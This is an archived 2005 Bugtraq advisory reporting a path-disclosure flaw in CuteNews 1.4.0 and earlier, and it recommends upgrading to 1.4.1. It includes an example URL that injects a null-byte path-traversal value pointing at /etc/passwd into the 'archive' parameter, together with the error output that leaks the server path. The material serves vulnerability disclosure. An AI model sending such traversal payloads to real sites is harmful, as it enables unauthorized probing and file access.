lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 7 Nov 2005 12:23:50 +0300 (MSK)
From: poizon@...urityinfo.ru
To: bugtraq@...urityfocus.com
Subject: Path disclosure in CuteNews <= 1.4.0


A remote user can supply a specially crafted URL to
cause the system to display an error message that
discloses the installation path and other data.
Bug exists in "index.php".

Example:
http://victim.com/index.php?subaction=showfull
&id=1128227686&archive=../../../../../../etc/passwd%00&start_from=&ucat=1&

Error:
Warning:
file(/storage/bg/myst/www/irc/cutenews/data/archives/../../../../../../../../../etc/passwd\0.news.arch):
failed to open stream: No such file or directory in
/storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 268

Warning: Invalid argument supplied for foreach() in
/storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 270
Can not find an article with id: 1128227686
-------------------------------------------------------------------

Solution: Upgrade version 1.4.1

-------------------------------------------
Original advisory:
http://www.securityinfo.ru/2005/11/____cutenews_140.html
****************************
http://www.securityinfo.ru



Powered by blists - more mailing lists